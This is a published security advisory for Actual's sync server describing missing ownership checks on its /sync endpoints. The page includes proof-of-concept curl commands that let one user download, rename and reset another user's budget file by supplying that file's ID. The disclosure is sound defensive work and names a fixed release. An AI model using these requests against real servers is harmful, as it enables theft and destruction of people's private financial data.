GHSA-QMJJ-P7M9-WJRV
Vulnerability from github – Published: 2026-02-27 19:29 – Updated: 2026-02-27 19:29
VLAI?
Summary
@actual-app/sync-server: Missing authorization in sync endpoints allows cross-user budget file access in multi-user mode
Details
In multi-user mode (OpenID), the sync API endpoints (/sync/*) don't verify that the authenticated user owns or has access to the file being operated on. Any authenticated user can read, modify, and overwrite any other user's budget files by providing their file ID.
Affected Code
File: packages/sync-server/src/app-sync.ts
The validateSessionMiddleware on line 31 confirms the user is authenticated, but individual endpoints only check that the file exists (via verifyFileExists), never that the requesting user owns or has access to the file.
Compare with POST /sync/delete-user-file (lines 394-430) which correctly checks:
const isOwner = file.owner === userId;
const isServerAdmin = isAdmin(userId);
if (!isOwner && !isServerAdmin) { ... }
This check is missing from all other endpoints.
Affected Endpoints
GET /sync/download-user-file- download any budget filePOST /sync/upload-user-file- overwrite any budget filePOST /sync/sync- read/write sync messages of any filePOST /sync/user-get-key- read encryption key infoPOST /sync/user-create-key- change encryption keyPOST /sync/reset-user-file- reset sync statePOST /sync/update-user-filename- rename fileGET /sync/get-user-file-info- read file metadata
PoC
Setup: Two users (Alice, Bob) authenticated via OpenID on the same Actual server. Alice has a budget with fileId abc-123.
Bob downloads Alice's budget:
curl -X GET 'https://actual.example.com/sync/download-user-file' \
-H 'X-Actual-Token: <bob-session-token>' \
-H 'X-Actual-File-Id: abc-123' \
-o stolen-budget.blob
Bob reads Alice's file metadata:
curl -X GET 'https://actual.example.com/sync/get-user-file-info' \
-H 'X-Actual-Token: <bob-session-token>' \
-H 'X-Actual-File-Id: abc-123'
Bob renames Alice's budget:
curl -X POST 'https://actual.example.com/sync/update-user-filename' \
-H 'X-Actual-Token: <bob-session-token>' \
-H 'Content-Type: application/json' \
-d '{"fileId": "abc-123", "name": "pwned"}'
Bob resets Alice's sync state (destructive):
curl -X POST 'https://actual.example.com/sync/reset-user-file' \
-H 'X-Actual-Token: <bob-session-token>' \
-H 'Content-Type: application/json' \
-d '{"fileId": "abc-123"}'
File IDs can be discovered by admin users via GET /sync/list-user-files (admins see all files), through user_access sharing, or by guessing.
Impact
In multi-user deployments (OpenID mode), any authenticated user can steal other users' complete financial data (transactions, accounts, balances, payees), modify or destroy their budgets, and tamper with encryption keys. This is a personal finance app, so the data is highly sensitive.
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 26.2.0"
},
"package": {
"ecosystem": "npm",
"name": "@actual-app/sync-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27638"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-27T19:29:46Z",
"nvd_published_at": "2026-02-26T23:16:34Z",
"severity": "MODERATE"
},
"details": "In multi-user mode (OpenID), the sync API endpoints (`/sync/*`) don\u0027t verify that the authenticated user owns or has access to the file being operated on. Any authenticated user can read, modify, and overwrite any other user\u0027s budget files by providing their file ID.\n\n## Affected Code\n\nFile: `packages/sync-server/src/app-sync.ts`\n\nThe `validateSessionMiddleware` on line 31 confirms the user is authenticated, but individual endpoints only check that the file *exists* (via `verifyFileExists`), never that the requesting user *owns* or *has access to* the file.\n\nCompare with `POST /sync/delete-user-file` (lines 394-430) which correctly checks:\n```js\nconst isOwner = file.owner === userId;\nconst isServerAdmin = isAdmin(userId);\nif (!isOwner \u0026\u0026 !isServerAdmin) { ... }\n```\n\nThis check is missing from all other endpoints.\n\n## Affected Endpoints\n\n- `GET /sync/download-user-file` - download any budget file\n- `POST /sync/upload-user-file` - overwrite any budget file\n- `POST /sync/sync` - read/write sync messages of any file\n- `POST /sync/user-get-key` - read encryption key info\n- `POST /sync/user-create-key` - change encryption key\n- `POST /sync/reset-user-file` - reset sync state\n- `POST /sync/update-user-filename` - rename file\n- `GET /sync/get-user-file-info` - read file metadata\n\n## PoC\n\nSetup: Two users (Alice, Bob) authenticated via OpenID on the same Actual server. Alice has a budget with fileId `abc-123`.\n\nBob downloads Alice\u0027s budget:\n```bash\ncurl -X GET \u0027https://actual.example.com/sync/download-user-file\u0027 \\\n -H \u0027X-Actual-Token: \u003cbob-session-token\u003e\u0027 \\\n -H \u0027X-Actual-File-Id: abc-123\u0027 \\\n -o stolen-budget.blob\n```\n\nBob reads Alice\u0027s file metadata:\n```bash\ncurl -X GET \u0027https://actual.example.com/sync/get-user-file-info\u0027 \\\n -H \u0027X-Actual-Token: \u003cbob-session-token\u003e\u0027 \\\n -H \u0027X-Actual-File-Id: abc-123\u0027\n```\n\nBob renames Alice\u0027s budget:\n```bash\ncurl -X POST \u0027https://actual.example.com/sync/update-user-filename\u0027 \\\n -H \u0027X-Actual-Token: \u003cbob-session-token\u003e\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"fileId\": \"abc-123\", \"name\": \"pwned\"}\u0027\n```\n\nBob resets Alice\u0027s sync state (destructive):\n```bash\ncurl -X POST \u0027https://actual.example.com/sync/reset-user-file\u0027 \\\n -H \u0027X-Actual-Token: \u003cbob-session-token\u003e\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"fileId\": \"abc-123\"}\u0027\n```\n\nFile IDs can be discovered by admin users via `GET /sync/list-user-files` (admins see all files), through `user_access` sharing, or by guessing.\n\n## Impact\n\nIn multi-user deployments (OpenID mode), any authenticated user can steal other users\u0027 complete financial data (transactions, accounts, balances, payees), modify or destroy their budgets, and tamper with encryption keys. This is a personal finance app, so the data is highly sensitive.",
"id": "GHSA-qmjj-p7m9-wjrv",
"modified": "2026-02-27T19:29:46Z",
"published": "2026-02-27T19:29:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/actualbudget/actual/security/advisories/GHSA-qmjj-p7m9-wjrv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27638"
},
{
"type": "WEB",
"url": "https://github.com/actualbudget/actual/commit/9966c024cb75f57943193cac8e42f401efed9d08"
},
{
"type": "PACKAGE",
"url": "https://github.com/actualbudget/actual"
},
{
"type": "WEB",
"url": "https://github.com/actualbudget/actual/releases/tag/v26.2.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "@actual-app/sync-server: Missing authorization in sync endpoints allows cross-user budget file access in multi-user mode"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…